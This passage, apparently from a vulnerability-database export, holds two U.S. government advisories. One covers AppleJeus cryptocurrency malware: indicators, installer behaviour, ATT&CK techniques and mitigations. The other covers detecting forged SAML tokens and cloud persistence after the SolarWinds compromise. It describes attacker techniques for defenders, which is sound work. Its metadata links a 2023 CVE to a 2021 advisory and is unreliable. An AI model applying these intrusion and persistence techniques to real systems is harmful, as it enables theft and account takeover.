[[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]).\n\nThe domain `ants2whale[.]com` resolved to IP address `198.54.114[.]237` from September 23, 2020, to January 22, 2021. The IP address is controlled by NameCheap, Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN for `CoinGoTrade[.]com` and `Dorusio[.]com`.\n\nThe domain `ants2whale[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Ants2Whale Application Analysis**\n\n#### **_Windows Program_**\n\nAs of late 2020, the Windows program was not available on VirusTotal. It is likely very similar to the macOS X version detailed below.\n\n#### _**macOS X Program**_\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `Ants2Whale` in folder `/Applications/Ants2whale.app/Contents/MacOS/Ants2whale`\n * Installs `Ants2WhaleHelper` in folder `/Library/Application Support/Ants2WhaleSupport/`\n * Executes a `postinstall` script \n * Moves `com.Ants2whale.pkg.wallet.plist` to folder `/Library/LaunchDaemons/`\n * Runs `Ants2WhaleHelper` in the background\n\nThe `Ants2Whale` and `Ants2WhaleHelper` programs and the `postinstall` script function almost identically to previous versions of AppleJeus and will not be discussed in depth in this advisory.\n\nFor more details on AppleJeus Version 7: Ants2Whale, see [MAR-10322463-7.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048g>).\n\n### ATT&amp;CK Profile\n\nFigure 2 and table 2 provide summaries of the MITRE ATT&amp;CK techniques observed.\n\n\n\n_Figure 2: MITRE ATT&amp;CK enterprise techniques used by AppleJeus_\n\n_Table 2: MITRE ATT&amp;CK techniques observed_\n\n**Tactic Title** | **Technique ID** | **Technique Title ** \n---|---|--- \n[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1583.001 | Acquire Infrastructure: Domain \n[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1583.006 | Acquire Infrastructure: Web Services \n[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1587.001 | Develop Capabilities: Malware \n[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1588.003 | Obtain Capabilities: Code Signing Certificates \n[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1588004 | Obtain Capabilities: Digital Certificates \n[Initial Access [TA0001]](<https://attack.mitre.org/versions/v8/tactics/TA0001>) | T1566.002 | Phishing: Spearphishing Link \n[Execution [TA0002]](<https://attack.mitre.org/versions/v8/tactics/TA0002>) | T1059 | Command and Scripting Interpreter \n[Execution [TA0002]](<https://attack.mitre.org/versions/v8/tactics/TA0002>) | T1059.004 | Command and Scripting Interpreter: Unix Shell \n[Execution [TA0002]](<https://attack.mitre.org/versions/v8/tactics/TA0002>) | T1204.002 | User Execution: Malicious File \n[Persistence [TA0003]](<https://attack.mitre.org/versions/v8/tactics/TA0003>) | T1053.004 | Scheduled Task/Job: Launchd \n[Persistence [TA0003]](<https://attack.mitre.org/versions/v8/tactics/TA0003>) | T1543.004 | Create or Modify System Process: Launch Daemon \n[Persistence [TA0003]](<https://attack.mitre.org/versions/v8/tactics/TA0003>) | T1547 | Boot or Logon Autostart Execution \n[Privilege Escalation [TA0004]](<https://attack.mitre.org/versions/v8/tactics/TA0004>) | T1053.005 | Scheduled Task/Job: Scheduled Task \n[Defense Evasion [TA0005]](<https://attack.mitre.org/versions/v8/tactics/TA0005>) | T1027 | Obfuscated Files or Information \n[Defense Evasion [TA0005]](<https://attack.mitre.org/versions/v8/tactics/TA0005>) | T1548 | Abuse Elevation Control Mechanism \n[Defense Evasion [TA0005]](<https://attack.mitre.org/versions/v8/tactics/TA0005>) | T1564.001 | Hide Artifacts: Hidden Files and Directories \n[Discovery [TA0007]](<https://attack.mitre.org/versions/v8/tactics/TA0007>) | T1033 | System Owner/User Discovery \n[Exfiltration [TA0010]](<https://attack.mitre.org/versions/v8/tactics/TA0010>) | T1041 | Exfiltration Over C2 Channel \n[Command and Control [TA0011]](<https://attack.mitre.org/versions/v8/tactics/TA0011>) | T1071.001 | \n\nApplication Layer Protocol: Web Protocols \n \n[Command and Control [TA0011]](<https://attack.mitre.org/versions/v8/tactics/TA0011>) | T1573 | Encrypted Channel \n[Command and Control [TA0011]](<https://attack.mitre.org/versions/v8/tactics/TA0011>) | T1573.001 | Encrypted Channel: Symmetric Cryptography \n \n### Mitigations\n\n### Compromise Mitigations\n\nOrganizations that identify AppleJeus malware within their networks should take immediate action. Initial actions should include the following steps.\n\n * Contact the FBI, CISA, or Treasury immediately regarding any identified activity related to AppleJeus. (Refer to the Contact Information section below.)\n * Initiate your organization\u2019s incident response plan.\n * Generate new keys for wallets, and/or move to new wallets.\n * Introduce a two-factor authentication solution as an extra layer of verification. \n * Use hardware wallets, which keep the private keys in a separate, secured storage area.\n * To move funds out off a compromised wallet: \n * Do not use the malware listed in this advisory to transfer funds, and \n * Form all transactions offline and then broadcast them to the network all at once in a short online session, ideally prior to the attacker accessing them.\n * Remove impacted hosts from network.\n * Assume the threat actors have moved laterally within the network and downloaded additional malware.\n * Change all passwords to any accounts associated with impacted hosts.\n * Reimage impacted host(s). \n * Install anti-virus software to run daily deep scans of the host.\n * Ensure your anti-virus software is setup to download the latest signatures daily.\n * Install a Host Based Intrusion Detection (HIDS)-based software and keep it up to date.\n * Ensure all software and hardware is up to date, and all patches have been installed.\n * Ensure network-based firewall is installed and/or up to date.\n * Ensure the firewall\u2019s firmware is up to date.\n\n### Pro-Active Mitigations\n\nConsider the following recommendations for defense against AppleJeus malware and related activity.\n\n#### _Cryptocurrency Users_\n\n * Verify source of cryptocurrency-related applications.\n * Use multiple wallets for key storage, striking the appropriate risk balance between hot and cold storage.\n * Use custodial accounts with multi-factor authentication mechanisms for both user and device verification.\n * Patronize cryptocurrency service businesses that offer indemnity protections for lost or stolen cryptocurrency.\n * Consider having a dedicated device for cryptocurrency management.\n\n#### _Financial Service Companies_\n\n * Verify compliance with Federal Financial Institutions Examination Council (FFIEC) handbooks at [https://ithandbook.ffiec.gov](<https://ithandbook.ffiec.gov/>), especially those related to information security.\n * Report suspicious cyber and financial activities. For more information on mandatory and voluntary reporting of cyber events via suspicious activity reports, see the Financial Crimes Enforcement Network (FinCEN) Advisory FIN-2016-A005: Advisory to Financial Institutions on Cyber- Events and Cyber-Enabled Crime at <https://www.fincen.gov/sites/default/files/advisory/2016-10-25/Cyber%20Threats%20Advisory%20-%20FINAL%20508_2.pdf> and FinCEN\u2019s Section 314(b) Fact Sheet at <https://www.fincen.gov/sites/default/files/shared/314bfactsheet.pdf>.\n\n#### _Cryptocurrency Businesses_\n\n * Verify compliance with the Cryptocurrency Security Standard at <http://cryptoconsortium.github.io/CCSS/>.\n\n#### _All Organizations_\n\n * Incorporate IOCs identified in CISA\u2019s Malware Analysis Reports on <https://us-cert.cisa.gov/northkorea> into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity.\n * See table 3 below, which provides a summary of preventative ATT&amp;CK mitigations based on observed techniques.\n\n_Table 3: MITRE ATT&amp;CK mitigations based on observed techniques_\n\n**Mitigation** | **Description** \n---|--- \n[User Training [M1017]](<https://attack.mitre.org/versions/v8/mitigations/M1017>) | Train users to identify social engineering techniques and spearphishing emails. \n[User Training [M1017]](<https://attack.mitre.org/versions/v8/mitigations/M1017>) | Provide users with the awareness of common phishing and spearphishing techniques and raise suspicion for potentially malicious events. \n[User Account Management [M1018]](<https://attack.mitre.org/versions/v8/mitigations/M1018>) | Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons. \n[User Account Management [M1018]](<https://attack.mitre.org/versions/v8/mitigations/M1018>) | Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. \n[SSL/TLS Inspection [M1020]](<https://attack.mitre.org/versions/v8/mitigations/M1020>) | Use SSL/TLS inspection to see encrypted sessions\u2019 contents to look for network-based indicators of malware communication protocols. \n[Restrict Web-Based Content [M1021]](<https://attack.mitre.org/versions/v8/mitigations/M1021>) | Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if the activity cannot be monitored well or poses a significant risk. \n[Restrict Web-Based Content [M1021]](<https://attack.mitre.org/versions/v8/mitigations/M1021>) | Block Script extensions to prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. \n[Restrict Web-Based Content [M1021]](<https://attack.mitre.org/versions/v8/mitigations/M1021>) | Employ an adblocker to prevent malicious code served up through ads from executing. \n[Restrict File and Directory Permissions [M1022]](<https://attack.mitre.org/versions/v8/mitigations/M1022>) | Prevent all users from writing to the `/Library/StartupItems `directory to prevent any startup items from getting registered since `StartupItems` are deprecated. \n[Privileged Account Management [M1026]](<https://attack.mitre.org/versions/v8/mitigations/M1026>) | When PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. \n[Privileged Account Management [M1026]](<https://attack.mitre.org/versions/v8/mitigations/M1026>) | Configure the Increase Scheduling Priority option only to allow the Administrators group the rights to schedule a priority process. \n[Operating System Configuration [M1028]](<https://attack.mitre.org/versions/v8/mitigations/M1028>) | Configure settings for scheduled tasks to force tasks to run under the authenticated account\u2019s context instead of allowing them to run as SYSTEM. \n[Network Intrusion Prevention [M1031]](<https://attack.mitre.org/versions/v8/mitigations/M1031>) | Use network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware and mitigate activity at the network level. \n[Execution Prevention [M1038]](<https://attack.mitre.org/versions/v8/mitigations/M1038>) | Use application control tools where appropriate. \n[Execution Prevention [M1038]](<https://attack.mitre.org/versions/v8/mitigations/M1038>) | Use application control tools to prevent the running of executables masquerading as other files. \n[Behavior Prevention on Endpoint [M1040]](<https://attack.mitre.org/versions/v8/mitigations/M1040>) | Configure endpoint (if possible) to block some process injection types based on common sequences of behavior during the injection process. \n[Disable or Remove Feature or Program [M1042]](<https://attack.mitre.org/versions/v8/mitigations/M1042>) | Disable or remove any unnecessary or unused shells or interpreters. \n[Code Signing [M1045]](<https://attack.mitre.org/versions/v8/mitigations/M1045>) | Where possible, only permit the execution of signed scripts. \n[Audit [M1047]](<https://attack.mitre.org/versions/v8/mitigations/M1047>) | Audit logging for `launchd` events in macOS can be reviewed or centrally collected using multiple options, such as Syslog, OpenBSM, or OSquery. \n[Audit [M1047]](<https://attack.mitre.org/versions/v8/mitigations/M1047>) | Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. \n[Antivirus/Antimalware [M1049]](<Antivirus/Antimalware%20%5BM1049%5D>) | Use an antivirus program to quarantine suspicious files automatically. \n \n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>),\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * Treasury Office of Cybersecurity and Critical Infrastructure Protection (Treasury OCCIP) (202-622-3000 or [OCCIP-Coord@treasury.gov](<mailto:OCCIP-Coord@treasury.gov>)).\n\n### References\n\n[[1] CISA Alert AA20-239A: FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks](<https://us-cert.cisa.gov/ncas/alerts/aa20-239a>)\n\n[[2] Department of the Treasury Press Release: Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group](<https://home.treasury.gov/news/press-releases/sm924>)\n\n[[3] Department of Justice Press Release: Two Chinese Nationals Charged with Laundering Over $100 Million in Cryptocurrency From Exchange Hack](<https://www.justice.gov/opa/pr/two-chinese-nationals-charged-laundering-over-100-million-cryptocurrency-exchange-hack>)\n\n[[4] CISA Alert TA17-318A: HIDDEN COBRA \u2013 North Korean Remote Administration Tool: FALLCHILL](<https://us-cert.cisa.gov/ncas/alerts/TA17-318A>)\n\n[[5] CISA Alert TA17-318A: HIDDEN COBRA \u2013 North Korean Remote Administration Tool: FALLCHILL ](<https://us-cert.cisa.gov/ncas/alerts/TA17-318A>)\n\n[[6] MITRE ATT&amp;CK Software: FALLCHILL](<https://attack.mitre.org/versions/v8/software/S0181/>)\n\n[[7] SecureList: Operation AppleJeus Sequel](<https://securelist.com/operation-applejeus-sequel/95596/>)\n\n[[8] GitHub: Blackbird Bitcoin Arbitrage](<https://github.com/butor/blackbird>)\n\n### Revisions\n\nFebruary 17, 2021: Initial Version|April 15, 2021: Updated MITRE ATT&amp;CK technique from Command and Scripting Interpreter: AppleScript [T1059.002] to Command and Scripting Interpreter: Unix Shell [T1059.004].\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "AppleJeus: Analysis of North Korea\u2019s Cryptocurrency Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-04-15T12:00:00", "id": "AA21-048A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:03:23", "description": "### Summary\n\n_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\n_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_\n\nThis Alert is a companion alert to [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>). AA20-352A primarily focuses on an advanced persistent threat (APT) actor\u2019s compromise of SolarWinds Orion products as an initial access vector into networks of U.S. Government agencies, critical infrastructure entities, and private network organizations. As noted in AA20-352A, the Cybersecurity and Infrastructure Security Agency (CISA) has evidence of initial access vectors in addition to the compromised SolarWinds Orion products.\n\nThis Alert also addresses activity\u2014irrespective of the initial access vector leveraged\u2014that CISA attributes to an APT actor. Specifically, CISA has seen an APT actor using compromised applications in a victim\u2019s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations. These tactics, techniques, and procedures (TTPs) feature three key components:\n\n * Compromising or bypassing federated identity solutions;\n * Using forged authentication tokens to move laterally to Microsoft cloud environments; and\n * Using privileged access to a victim\u2019s cloud environment to establish difficult-to-detect persistence mechanisms for Application Programming Interface (API)-based access.\n\nThis Alert describes these TTPs and offers an overview of, and guidance on, available open-source tools\u2014including a CISA-developed tool, Sparrow\u2014for network defenders to analyze their Microsoft Azure Active Directory (AD), Office 365 (O365), and M365 environments to detect potentially malicious activity.\n\n**Note**: this Alert describes artifacts\u2014presented by these attacks\u2014from which CISA has identified detectable evidence of the threat actor\u2019s initial objectives. CISA continues to analyze the threat actor\u2019s follow-on objectives.\n\n### Technical Details\n\nFrequently, CISA has observed the APT actor gaining _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v8/tactics/TA0001/>)] to victims\u2019 enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Sunburst).[[1]](<https://www.zdnet.com/article/a-second-hacking-group-has-targeted-solarwinds-systems/ >) However, CISA is investigating instances in which the threat actor may have obtained initial access by _Password Guessing_ [[T1110.001](<https://attack.mitre.org/versions/v8/techniques/T1110/001/>)], _Password Spraying_ [[T1110.003](<https://attack.mitre.org/versions/v8/techniques/T1110/003>)], and/or exploiting inappropriately secured administrative or service credentials (_Unsecured Credentials _[[T1552](<https://attack.mitre.org/versions/v8/techniques/T1552/>)]) instead of utilizing the compromised SolarWinds Orion products.\n\nCISA observed this threat actor moving from user context to administrator rights for _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v8/tactics/TA0004/>)] within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federated Services (ADFS) certificate-signing capability. This enumeration allows threat actors to forge authentication tokens (OAuth) to issue claims to service providers\u2014without having those claims checked against the identity provider\u2014and then to move laterally to Microsoft Cloud environments (_Lateral Movement _[[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]).\n\nThe threat actor has also used on-premises access to manipulate and bypass identity controls and multi-factor authentication. This activity demonstrates how sophisticated adversaries can use credentials from one portion of an organization to move laterally (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]) through trust boundaries, evade defenses and detection (_Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v8/tactics/TA0005/>)]), and steal sensitive data (_Collection _[[TA0009](<https://attack.mitre.org/versions/v8/tactics/TA0009/>)]).\n\nThis level of compromise is challenging to remediate and requires a rigorous multi-disciplinary effort to regain administrative control before recovering.\n\n### Mitigations\n\n#### Detection\n\nGuidance on identifying affected SolarWinds software is well documented.[[2](<https://www.cisa.gov/supply-chain-compromise >)] However\u2014once an organization identifies a compromise via SolarWinds Orion products or other threat actor TTPs\u2014identifying follow-on activity for on-premises networks requires fine-tuned network and host-based forensics.\n\nThe nature of cloud forensics is unique due to the growing and rapidly evolving technology footprints of major vendors. Microsoft's O365 and M365 environments have built-in capabilities for detecting unusual activity. Microsoft also provides premium services (Advanced Threat Protection [ATP] and Azure Sentinel), which enable network defenders to investigate TTPs specific to the Solorigate activity.[[3]](<https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095 >)\n\n#### Detection Tools\n\n_CISA is providing examples of detection tools for informational purposes only. CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\nThere are a number of open-source tools available to investigate adversary activity in Microsoft cloud environments and to detect unusual activity, service principals, and application activity.[[4]](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/ >) Publicly available PowerShell tools that network defenders can use to investigate M365 and Microsoft Azure include:\n\n * CISA's Sparrow,\n * Open-source utility Hawk, and\n * CrowdStrike's Azure Reporting Tool (CRT).\n\nAdditionally, Microsoft's Office 365 Management API and Graph API provide an open interface for ingesting telemetry and evaluating service configurations for signs of anomalous activity and intrusion.\n\n**Note**: these open-source tools are highlighted and explained to assist with on-site investigation and remediation in cloud environments but are not all-encompassing. Open source tools can be complemented by services such as Azure Sentinel, a Microsoft premium service that provides comprehensive analysis tools, including custom detections for the activity indicated.\n\n#### General Guidance on Using Detection Tools\n\n 1. Audit the creation and use of service principal credentials. Look for unusual application usage, such as use of dormant applications.\n 2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application. Look for unexpected trust relationships added to the Azure Active Directory.\n 3. Download the interactive sign-ins from the Azure admin portal or use the Microsoft Sentinel product. Review new token validation time periods with high values and investigate whether it was a legitimate change or an attempt to gain persistence by a threat actor.\n\n#### Sparrow\n\nCISA created [Sparrow](<https://github.com/cisagov/Sparrow>) to help network defenders detect possible compromised accounts and applications in the Azure/M365 environment. The tool focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data. It is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent attacks on federated identity sources and applications.\n\n_(Updated April 8, 2021):_ CISA has also created \"Aviary,\" which is a companion Splunk dashboard that can assist in visualizing and reviewing the output of Sparrow. Network defenders can find Aviary on [CISA's Sparrow GitHub page](<https://github.com/cisagov/Sparrow>). CISA advises network defenders to perform the following actions to use Sparrow:\n\n 1. Use Sparrow to detect any recent domain authentication or federation modifications. \n 1. Domain and federation modification operations are uncommon and should be investigated.\n 2. Examine logs for new and modified credentials applied to applications and service principals; delineate for the credential type. Sparrow can be used to detect the modification of service principals and application credentials. \n\n 1. Create a timeline for all credential changes, focusing on recent wholesale changes.\n 2. Review the \u201ctop actors\u201d for activity in the environment and the number of credential modifications performed.\n 3. Monitor changes in application and service principal credentials.\n 4. Investigate any instances of excessive permissions being granted, including, but not limited to, Exchange Online, Microsoft Graph, and Azure AD Graph.\n 3. Use Sparrow to detect privilege escalation, such as adding a service principal, user, or group to a privileged role.\n 4. Use Sparrow to detect `OAuth` consent and users\u2019 consent to applications, which is useful for interpreting changes in adversary TTPs.\n 5. Use Sparrow to identify anomalous Security Assertion Markup Language (SAML) token sign-ins by pivoting on the unified audit log UserAuthenticationValue of 16457, which is an indicator of how a SAML token was built and is a potential indicator for forged SAML tokens. \n\n 1. Note that this TTP has not been the subject of significant published security research but may indicate an unusual usage of a token, such as guest access for external partners to M365 resources.\n 6. Review the PowerShell logs that Sparrow exports. \n\n 1. Review PowerShell mailbox sign-ins and validate that the logins are legitimate actions.\n 2. Review PowerShell usage for users with PowerShell in the environment.\n 7. Use Sparrow to check the Graph API application permissions of all service principals and applications in M365/Azure AD. \n\n 1. Investigate unusual activity regarding Microsoft Graph API permissions (using either the legacy [https://graph.windows.net/ ](<https://graph.windows.net/>)or <https://graph.microsoft.com>). Graph is used frequently as part of these TTPs, often to access and manipulate mailbox resources.\n 8. Review Sparrow\u2019s listed tenant\u2019s Azure AD domains, to see if the domains have been modified.\n 9. For customers with G5 or E5 licensing levels, review MailItemsAccessed for insight into what application identification (ID) was used for accessing users\u2019 mailboxes. Use Sparrow to query for a specific application ID using the app id investigation capability, which will check to see if it is accessing mail or file items. \n\n 1. The MailItemsAccessed event provides audibility for mailbox data accessed via mail protocols or clients.\n 2. By analyzing the MailItemsAccessed action, incident responders can determine which user mailbox items have been accessed and potentially exfiltrated by a threat actor. This event will be recorded even in some situations where the message was not necessarily read interactively (e.g., bind or sync).[[5]](<https://docs.microsoft.com/en-us/microsoft-365/compliance/advanced-audit?view=o365-worldwide>)\n 3. The resulting suspicious application ID can provide incident responders with a pivot to detect other suspicious applications that require additional analysis.\n 4. Check for changes to applications with regards to the accessing of resources such as mail or file items.\n\n_(Updated April 8, 2021): _Aviary can be used to assist with performing the above tasks. To install Aviary, after running Sparrow:\n\n 1. Ingest comma separated values (CSV) output from the Sparrow PowerShell script into Splunk. \n 1. Sparrow output will have the following default filenames, which should not be modified: `AppUpdate_Operations_Export.csv`, `AppRoleAssignment_Operations_Export.csv`, `Consent_Operations_Export.csv`, `Domain_List.csv`, `Domain_Operations_Export.csv`, `FileItems_Operations_Export.csv`, `MailItems_Operations_Export.csv`, `PSLogin_Operations_Export.csv`, `PSMailbox_Operations_Export.csv`, `SAMLToken_Operations_Export.csv`, `ServicePrincipal_Operations_Export.csv`\n 2. Copy and paste the contents of the .xml file (aviary.xml in the root directory) into a new dashboard.\n 3. Use the data selection filters to point to the indexed Sparrow data (see figure 1)\n\n\n\nFigure 1: Data Selection Filters\n\n#### Hawk\n\nHawk is an open-source, PowerShell-driven, community-developed tool network defenders can use to quickly and easily gather data from O365 and Azure for security investigations. Incident responders and network defenders can investigate specific user principals or the entire tenant. Data it provides include IP addresses and sign-in data. Additionally, Hawk can track IP usage for concurrent login situations.\n\nHawk users should review login details for administrator accounts and take the following steps.\n\n#### CrowdStrike Azure Reporting Tool\n\n[CrowdStrike's Azure Reporting Tool ](<https://github.com/CrowdStrike/CRT>)(CRT) can help network defenders analyze their Microsoft Azure AD and M365 environment to help organizations analyze permissions in their Azure AD tenant and service configuration. This tool has minor overlap with Sparrow; it shows unique items, but it does not cover the same areas. CISA is highlighting this tool because it is one of the only free, open-source tools available to investigate this activity and could be used to complement Sparrow.\n\n#### Detection Tool Distinctions\n\n#### Detection Methods\n\nMicrosoft breaks the threat actor\u2019s recent activity into four primary stages, which are described below along with associated detection methods. Microsoft describes these stages as beginning with all activity after the compromise of the on-premises identity solution, such as ADFS.[[6]](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610 >)\n\nNote: this step provides an entry vector to cloud technology environments, and is unnecessary when the threat actor has compromised an identity solution or credential that allows the APT direct access to the cloud(e.g., without leveraging the SolarWinds Orion vulnerability).\n\n**Stage 1: Forging a trusted authentication token used to access resources that trust the on-premises identity provider**\n\nThese attacks (often referred to as \u201cGolden Security Assertion Markup Language\u201d attacks) can be analyzed using a combination of cloud-based and standard on-premises techniques.[[7]](<https://www.sygnia.co/golden-saml-advisory>) For example, network defenders can use `OAuth` claims for specific principals made at the Azure AD level and compare them to the on-premises identity.\n\nExport sign-in logs from the Azure AD portal and look at the Authentication Method field.\n\n**Note**: at portal.azure.com, click on a user and review the authentication details (e.g., date, method, result). Without Sentinel, this is the only way to get these logs, which are critical for this effort.\n\n**_Detection Method 1: Correlating service provider login events with corresponding authentication events in Active Directory Federation Services (ADFS) and Domain Controllers_**\n\nUsing SAML single sign-on, search for any logins to service providers that do not have corresponding event IDs 4769, 1200, and 1202 in the domain.\n\n**_Detection Method 2: Identifying certificate export events in ADFS_**\n\nLook for:\n\n**_Detection Method 3: Customizing SAML response to identify irregular access_**\n\nThis method serves as prevention for the future (and would only detect future, not past, activity), as it helps identify irregularities from the point of the change forward. Organizations can modify SAML responses to include custom elements for each service provider to monitor and detect any anomalous requests.[[8]](<https://www.sygnia.co/golden-saml-advisory>)\n\n**_Detection Method 4: Detecting malicious ADFS trust modification_**\n\nA threat actor who gains administrative access to ADFS can add a new, trusted ADFS rather than extracting the certificate and private key as part of a standard Golden SAML attack.[[9]](<https://www.sygnia.co/golden-saml-advisory>) \nNetwork defenders should look for:\n\n**Stage 2: Using the forged authentication token to create configuration changes in the Service Provider, such as Azure AD (establishing a foothold)**\n\nAfter the threat actor has compromised the on-premises identity provider, they identify their next series of objectives by reviewing activity in the Microsoft Cloud activity space (Microsoft Azure and M365 tenants).\n\nThe threat actor uses the ability to forge authentication tokens to establish a presence in the cloud environment. The actor adds additional credentials to an existing service principal. Once the threat actor has impersonated a privileged Azure AD account, they are likely to further manipulate the Azure/M365 environment (action on objectives in the cloud).\n\nNetwork defenders should take the following steps.\n\n**Stage 3: Acquiring an `OAuth` access token for the application using the forged credentials added to an existing application or service principal and calling APIs with the permissions assigned to that application**\n\nIn some cases, the threat actor has been observed adding permissions to existing applications or service principals. Additionally the actor has been seen establishing new applications or service principals briefly and using them to add permissions to the existing applications or service principals, possibly to add a layer of indirection (e.g., using it to add a credential to another service principal, and then deleting it).[[11]](<https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610 >)\n\nNetwork defenders should use Sparrow to:\n\n**Stage 4: Once access has been established, the threat actor Uses Microsoft Graph API to conduct action on objectives from an external RESTful API (queries impersonating existing applications).**\n\nNetwork defenders should:\n\n#### Microsoft Telemetry Nuances\n\nThe existing tools and techniques used to evaluate cloud-based telemetry sources present challenges not represented in traditional forensic techniques. Primarily, the amount of telemetry retention is far less than the traditional logging facilities of on-premises data sources. Threat actor activity that is more than 90 days old is unlikely to have been saved by traditional sources or be visible with the Microsoft M365 Management API or in the UAL.\n\nService principal logging is available using the Azure Portal via the \"Service Principal Sign-ins\" feature. Enable settings in the Azure Portal (see \u201cDiagnostic Setting\u201d) to ingest logs into Sentinel or a third-party security information and event management (SIEM) tool. An Azure Premium P1 or Premium P2 license is necessary to access this setting as well as other features, such as a log analytics workspace, storage account, or event hub.[[12]](<https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-all-sign-ins >) These logs must be downloaded manually if not ingested by one of the methods listed in the Detection Methods section.\n\nGlobal Administrator rights are often required by tools other than Hawk and Sparrow to evaluate M365 cloud security posture. Logging capability and visibility of data varies by licensing models and subscription to premium services, such as Microsoft Defender for O365 and Azure Sentinel. According to CrowdStrike, \"There was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible.\"[[13]](<https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/>)\n\nDocumentation for specific event codes, such as UserAuthenticationMethod 16457, which may indicate a suspicious SAML token forgery, is no longer available in the M365 Unified Access 